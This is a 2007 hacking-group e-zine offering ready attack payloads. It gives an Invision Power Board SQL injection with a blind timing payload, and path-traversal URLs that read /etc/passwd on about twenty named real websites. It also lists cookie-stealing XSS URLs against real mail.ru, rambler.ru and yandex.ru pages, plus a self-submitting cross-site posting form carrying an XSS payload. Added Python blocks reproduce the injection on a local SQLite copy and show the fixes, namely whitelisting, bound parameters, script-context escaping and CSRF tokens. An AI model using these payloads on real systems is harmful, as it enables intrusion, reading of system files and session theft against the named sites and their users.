The Gray Brotherhood Community
                            Channel: #TGBR, #hack-psihoz, Server: irc.dalnet.ru, Port: 6667
Contents

TGBR E-ZineS #1:

IPB <= 2.3.3 SQL injection:

Code:
-------------
adminlogs.php
-------------

BUG FOUND: perdimonokl aka 4nob1oz
BUG FOUND DATE: 24/11/2007
BUG DISCLOSED DATE: NOT YET

/*
* VULN FUNCTION
* ----------------
*
* function view()
*
* ----------------
* VULN CODE
*
* ----------------
*   else
*  {
*   $this->ipsclass->input['search_string'] = urldecode($this->ipsclass->input['search_string']);
*
*   // search_type (meant to be a column name) and search_string are taken straight from the
*   // request and concatenated into the WHERE clause. search_type is the injection point used
*   // in the exploit below: it sits outside any quotes, so the payload needs no quote characters.
*   $dbq = "m.".$this->ipsclass->input['search_type']." LIKE '%".$this->ipsclass->input['search_string']."%'";
*
*   // the tainted $dbq is executed twice: once for the count, once for the paged listing
*   $row = $this->ipsclass->DB->build_and_exec_query( array( 'select' => 'COUNT(m.id) as count', 'from' => 'admin_logs m', 'where' => $dbq ) );
*
*   $row_count = $row['count'];
*
*   $query = "&act=adminlog&code=view&search_type={$this->ipsclass->input['search_type']}&search_string=".urlencode($this->ipsclass->input['search_string']);
*
*   $this->ipsclass->DB->cache_add_query( 'adminlogs_view_two', array( 'dbq' => $dbq, 'limit_a' => $start ) );
*   $this->ipsclass->DB->cache_exec_query();
*  }
*
* ----------------
*
*/

EXPLOIT
-------

adsess=85f93b41dd3244e5680f5085b28b56bf ---> the admin session id. After you log in to the admin panel it appears in every ACP URL as the "adsess=" variable, so the hole is reachable only with an admin-panel login.

Replace the "adsess=" value in the URL below with your own.

The payload is a time-based blind test through search_type: if the first character of version() is 5 the if() returns 1 and the page comes back at once, otherwise benchmark() runs and the response is delayed. The trailing "--" comments out the LIKE clause the script appends after search_type.

http://localhost/forum/admin/index.php?adsess=85f93b41dd3244e5680f5085b28b56bf&section=admin&act=adminlog&code=view&act=adminlog&section=admin&search_string=333&search_type=act+and+1=if(substring(version(),1,1)=5,1,benchmark(999999,md5(now())))--
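What the adminlogs.php construction gives an attacker who controls search_type, as an added example (it is not IPB's code and not part of the zine): a Python/SQLite stand-in that builds the WHERE clause exactly as the snippet does, pulls the database version out character by character through search_type, and a hardened version that whitelists the column name and binds the search string. SQLite has no if()/benchmark(), so the oracle here is the returned row count rather than response time; the admin_logs rows and the ALLOWED_SEARCH_TYPES list are constructed for the example and are not IPB's real schema.

```python
import sqlite3
import string

# Constructed sample rows standing in for IPB's admin_logs table (not real data).
SAMPLE_LOGS = [
    (1, "login", "admin logged in"),
    (2, "edituser", "edited member 5"),
    (3, "settings", "changed board settings"),
]


def setup_db():
    """In-memory SQLite stand-in for the forum database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin_logs (id INTEGER PRIMARY KEY, act TEXT, note TEXT)")
    db.executemany("INSERT INTO admin_logs VALUES (?, ?, ?)", SAMPLE_LOGS)
    return db


def count_vulnerable(db, search_type, search_string):
    """Same construction as view() in adminlogs.php: both request values are
    concatenated straight into the WHERE clause."""
    dbq = "m." + search_type + " LIKE '%" + search_string + "%'"
    sql = "SELECT COUNT(m.id) AS count FROM admin_logs m WHERE " + dbq
    return db.execute(sql).fetchone()[0]


# Hypothetical whitelist for the example; IPB's real list of searchable columns differs.
ALLOWED_SEARCH_TYPES = ("act", "note")


def count_hardened(db, search_type, search_string):
    """A column name cannot be bound as a parameter, so it is checked against a
    whitelist; the search string is bound with a placeholder and never becomes
    part of the SQL text."""
    if search_type not in ALLOWED_SEARCH_TYPES:
        raise ValueError("invalid search_type: %r" % search_type)
    sql = "SELECT COUNT(m.id) AS count FROM admin_logs m WHERE m.%s LIKE ?" % search_type
    return db.execute(sql, ("%" + search_string + "%",)).fetchone()[0]


def blind_extract_version(db, max_len=16):
    """Boolean-based blind extraction of sqlite_version() through search_type.
    The zine's exploit uses MySQL if()/benchmark() as a timing oracle; here the
    row count in the response is the oracle (count > 0 means the guess was right)."""
    found = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in string.digits + ".":
            # m.id>0 keeps every row; the trailing '-- ' comments out the LIKE
            # clause the application appends after search_type.
            payload = "id>0 and substr(sqlite_version(),%d,1)='%s' -- " % (pos, ch)
            if count_vulnerable(db, payload, "333") > 0:
                hit = ch
                break
        if hit is None:  # substr() past the end returns '' so nothing matches
            break
        found += hit
    return found


def sqlite_version_direct(db):
    """Ground truth to compare the blind extraction against."""
    return db.execute("SELECT sqlite_version()").fetchone()[0]


if __name__ == "__main__":
    db = setup_db()
    print("legit search:", count_vulnerable(db, "act", "login"))
    print("extracted:", blind_extract_version(db), "real:", sqlite_version_direct(db))
    try:
        count_hardened(db, "id>0 and 1=1 -- ", "333")
    except ValueError as e:
        print("hardened rejected:", e)
```

The fix has two halves because the two inputs are different kinds of data: search_string is a value and belongs in a bound parameter, search_type is an identifier and can only be validated against a fixed list.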



Include (local file include, path traversal to /etc/passwd):

http://www.penguinadventure.com/index.php?file=../../../../../../../../etc/passwd
http://www.strikingdifference.com/index.php?file=../../../../../../../etc/passwd
http://ff.penguinadventure.com/index.php?file=../../../../../../../etc/passwd
http://bccd.cs.uni.edu/cgi-bin/viewcvs.cgi/bccdrt/index.php?view=../../../../../../../etc/passwd
http://dd.penguinadventure.com/index.php?file=../../../../../../../etc/passwd
http://www.coe.ou.edu/constgllry/index.php?file=../../../../../../../etc/passwd
http://www.motionart.net/index.php?file=../../../../../../../etc/passwd
http://stisidore.org/~doster/index.php?file=../../../../../../../etc/passwd
http://www.kneuro.net/littlesite/index.php?file=../../../../../../../etc/passwd
http://tennesseeencyclopedia.net/index.php?pg=../../../../../../../etc/passwd
http://www.chaminade.edu/index.php?pg=../../../../../../../etc/passwd
http://www.byjupiter.com/index.php?pg=../../../../../../../etc/passwd
http://www.powershacks.com/index.php?pg=/../../../../../../etc/passwd
http://www.freqofnature.com/index.php?pg=/../../../../../../etc/passwd
http://www.southwestguitar.com/index.php?pg=/../../../../../../etc/passwd
http://www.freshtastemeals.com/index.php?pg=/../../../../../../etc/passwd
http://www.aceinet.com/index.php?pg=/../../../../../../etc/passwd
http://wrightstax.com/index.php?pg=/../../../../../../etc/passwd
http://knights.geneseo.edu/index.php?pg=/../../../../../../etc/passwd
http://www.silvercreekny.net/index.php?pg=/../../../../../../etc/passwd
http://chico.com/kellybrown/index.php?pg=/../../../../../../etc/passwd


XSS

http://hosting.mail.ru/Login.jsp?password="><img src=javascript:alert(document.cookie)>
http://kubok.yandex.ru/regkubok_zachet/demo_1189295051718576&subject="><img src=javascript:alert(document.cookie)>
http://help.rambler.ru/feedback.html?s=7715&fio="><img src=javascript:alert(document.cookie)>
http://games.mail.ru/game/?fletter=M&lang="><script>alert()</script>
http://love.rambler.ru/my/edit_voice_welcome.phtml?tburl="><script>alert(document.cookie)</script>
http://soft.mail.ru/uregistration/anketa_profile.php?adsfrom=search&f1="><script>alert()</script>
http://ds.rambler.ru/index.php?p=news&pubId=243&pubMode=<script>alert(document.cookie)</script>
http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.cookie)</script>
http://maffia.rambler.ru/info/info.php?Ij4iPjxpbWcgc3JjPWphdmFzY3JpcHQ6YWxlcnQoZG9jdW1lbnQuY29va2llKT4=
http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script>
http://topshop.rambler.ru/topshop.html?words="><script>alert(document.cookie)</script>
http://forum.yandex.ru/kubok/netrix.xhtml? ">testa <script>alert('testa')</script>
http://3sider.mail.ru/register.php?Hname='><script>alert(document.cookie)</script>
http://kp.mail.ru/read_story.html?story_id="><script>alert(document.cookie)</script>
http://direct.yandex.ru/catalog/vipurl.pl?type=confirm&UA=0&change=yes&agree=yes&UA="><script>alert(document.cookie)</script>


Passive XSS on web-hack: ../soft/wh_xss.rar, 1 KB

IPB 2.1.7 passive XSS by Don1-2 (unpublished XSS)
XSS#1
Download video
Size - 601 KB

Code:
<body onload="preview.submit();">
<center>
<!-- FORUM_SITE is the target IPB 2.1.7 host, FORUM_ID the id of a forum the victim can post in; the page submits itself as soon as it loads -->
<form id='postingform' action="http://FORUM_SITE/index.php?act=post&do=new_post&f=FORUM_ID" method="post" name="preview">
<input type="hidden" name="st" value='0'>
<input type="hidden" name="act" value='Post'>
<input type="hidden" name="s" value=''>
<input type="hidden" name="TopicTitle" value='tttttttttt1'>
<input type="hidden" name="TopicDesc" value='tttttttttt2'>
<input type="hidden" name="poll_question" value='tttttttttt3'>
<!-- the payload: it opens with </script> so that it breaks out of an inline script block the poll option is echoed into -->
<input type="hidden" name="question[1]" value='</script><script>alert(document.cookie)</script><script>'>
<input type="hidden" name="Post" value='textatatatatatatatata'>
<input type="hidden" name="enableemo" value='yes'>
<input type="hidden" name="enablesig" value='yes'>
<input type="hidden" name="mod_options" value='nowt'>
<input type="hidden" name="iconid" value='0'>
<!-- "preview" must be present; its value is the Russian-localised label of IPB's Preview button -->
<input type="hidden" name="preview" value='Предварительный просмотр'>
</form>
</center>
</body>
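Why the question[1] payload opens with </script>, and what closes the hole, as an added example that is not IPB's code and not part of Don1-2's post: a hypothetical preview page that drops the poll option into an inline script after escaping only quotes, parsed with Python's HTML tokenizer to show that the HTML parser ends the script at the first literal </script> no matter what the JavaScript string quoting says; the same page with the value serialised as a JSON literal and "</" neutralised; and a post handler that refuses the auto-submitted cross-site form because it carries no per-session token. The template, field names and token scheme are assumptions for the example, not IPB's.

```python
import hmac
import json
import secrets
from html.parser import HTMLParser

# The question[1] value from the form above (constructed copy for the example).
PAYLOAD = "</script><script>alert(document.cookie)</script><script>"


def render_preview_unsafe(question):
    """Hypothetical preview template (not IPB's): the value is embedded in an
    inline script with addslashes-style escaping of quotes and backslashes only."""
    escaped = question.replace("\\", "\\\\").replace('"', '\\"')
    return '<script>var pollQuestion = "%s";</script>' % escaped


def render_preview_safe(question):
    """Same page, with the value serialised as a JS string literal and every
    '</' turned into '<\\/' so the HTML tokenizer can never see '</script>'."""
    literal = json.dumps(question).replace("</", "<\\/")
    return "<script>var pollQuestion = %s;</script>" % literal


class ScriptCollector(HTMLParser):
    """Collects the body of every <script> element the way a browser's tokenizer
    delimits them: script content runs up to the next literal '</script>'."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


def script_bodies(html):
    """Returns the list of script bodies a browser would execute for this markup."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def issue_csrf_token(session):
    """Per-session secret the legitimate posting form must echo back."""
    session["csrf"] = secrets.token_hex(16)
    return session["csrf"]


def handle_post(session, form):
    """Post handler with both fixes: requests without this session's token are
    dropped (that is what defeats the self-submitting form, which cannot know the
    token), and the question is rendered with script-context escaping.
    Returns the rendered preview, or None when the request is rejected."""
    token = form.get("csrf", "")
    if not session.get("csrf") or not hmac.compare_digest(token, session["csrf"]):
        return None
    return render_preview_safe(form.get("question[1]", ""))


if __name__ == "__main__":
    print("unsafe:", script_bodies(render_preview_unsafe(PAYLOAD)))
    print("safe:  ", script_bodies(render_preview_safe(PAYLOAD)))
    session = {}
    token = issue_csrf_token(session)
    print("cross-site post:", handle_post(session, {"question[1]": PAYLOAD}))
    print("same-site post: ", handle_post(session, {"question[1]": PAYLOAD, "csrf": token}))
```

The tokenizer output is the whole point: with quote-only escaping the markup contains three script elements and the middle one is alert(document.cookie); HTML-entity escaping would not have been the right fix either, because inside a script element entities are not decoded and the value would reach JavaScript mangled, which is why the safe variant uses a JSON literal plus the "</" rewrite.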

XSS#2
Download video
Size - 220 KB


Created by TGBR Community
All Rights Reserved Trash 2007 ©